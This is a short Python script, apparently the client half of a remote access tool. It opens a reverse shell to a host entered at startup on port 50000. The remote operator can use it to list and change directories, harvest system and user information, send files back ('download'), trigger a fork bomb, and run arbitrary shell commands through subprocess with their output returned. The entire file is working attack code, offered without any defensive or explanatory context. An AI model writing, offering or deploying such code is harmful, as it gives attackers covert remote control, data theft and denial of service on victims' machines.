client.py

1. import socket
2. import subprocess
3. import os
4. import platform
5. import getpass
6. import colorama
7. from colorama import Fore, Style
8. from time import sleep
9.  
10. colorama.init()
11.  
12. RHOST = input("rhost?")
13. RPORT = 50000
14.  
15. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16. sock.connect((RHOST, RPORT))
17.  
18. while True:
19.     try:
20.         header = f"""{Fore.RED}{getpass.getuser()}@{platform.node()}{Style.RESET_ALL}:{Fore.LIGHTBLUE_EX}{os.getcwd()}{Style.RESET_ALL}$ """
21.         sock.send(header.encode())
22.         STDOUT, STDERR = None, None
23.         cmd = sock.recv(1024).decode("utf-8")
24.  
25.         # List files in the dir
26.         if cmd == "list":
27.             sock.send(str(os.listdir(".")).encode())
28.  
29.         # Forkbomb
30.         if cmd == "forkbomb":
31.             while True:
32.                 os.fork()
33.  
34.         # Change directory
35.         elif cmd.split(" ")[0] == "cd":
36.             os.chdir(cmd.split(" ")[1])
37.             sock.send("Changed directory to {}".format(os.getcwd()).encode())
38.  
39.         # Get system info
40.         elif cmd == "sysinfo":
41.             sysinfo = f"""
42. Operating System: {platform.system()}
43. Computer Name: {platform.node()}
44. Username: {getpass.getuser()}
45. Release Version: {platform.release()}
46. Processor Architecture: {platform.processor()}
47.            """
48.             sock.send(sysinfo.encode())
49.        
50.         # Download files
51.         elif cmd.split(" ")[0] == "download":
52.             with open(cmd.split(" ")[1], "rb") as f:
53.                 file_data = f.read(1024)
54.                 while file_data:
55.                     print("Sending", file_data)
56.                     sock.send(file_data)
57.                     file_data = f.read(1024)
58.                 sleep(2)
59.                 sock.send(b"DONE")
60.             print("Finished sending data")
61.  
62.         # Terminate the connection
63.         elif cmd == "exit":
64.             sock.send(b"exit")
65.             break
66.  
67.         # Run any other command
68.         else:
69.             comm = subprocess.Popen(str(cmd), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
70.             STDOUT, STDERR = comm.communicate()
71.             if not STDOUT:
72.                 sock.send(STDERR)
73.             else:
74.                 sock.send(STDOUT)
75.  
76.         # If the connection terminates
77.         if not cmd:
78.             print("Connection dropped")
79.             break
80.     except Exception as e:
81.         sock.send("An error has occured: {}".format(str(e)).encode())
82. sock.close()